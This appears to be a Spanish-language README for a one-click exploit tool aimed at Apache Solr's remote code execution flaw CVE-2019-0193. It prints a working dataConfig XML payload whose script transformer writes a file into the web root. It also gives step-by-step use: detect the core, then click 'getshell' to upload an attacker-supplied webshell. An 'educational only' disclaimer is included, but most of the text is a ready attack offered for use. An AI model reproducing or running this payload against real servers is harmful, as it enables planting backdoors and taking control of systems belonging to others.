
ApacheSolrRCE (CVE-2019-0193) permite escribir un shell con un solo clic; el principio es escribir un webshell mediante un flujo de archivos Java ejecutado por código.
Solo para intercambio educativo en seguridad de la información, no lo utilice para pruebas o ataques ilegales.
ApacheSolrRCE (CVE-2019-0193) escribe un shell con un solo clic. El principio es escribir una puerta trasera a través de un flujo de archivos Java ejecutado por código.
Nota: El autor no es muy hábil. Si encuentras algún error o tienes otras necesidades, descarga el código y modifícalo tú mismo.
Dado que los payloads que circulan en Internet son solo ejecución de comandos y no son convenientes para subir un webshell, escribí este payload (cuando se muestra 123456, significa que la escritura fue exitosa).
Nota: La herramienta solo ayuda en las pruebas. Si la herramienta no puede escribir, se recomienda hacerlo manualmente.
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>

Primero haga clic en 'Detectar', obtenga el core y determine si hay una vulnerabilidad.
Luego haga clic en 'getshell'.
Nota: Coloque su webshell en el directorio shell, la herramienta cargará automáticamente su webshell en la lista desplegable.

El proxy predeterminado es proxy HTTP, puerto 8080, está hardcodeado en el código. Si lo necesita, compílelo y modifíquelo usted mismo.
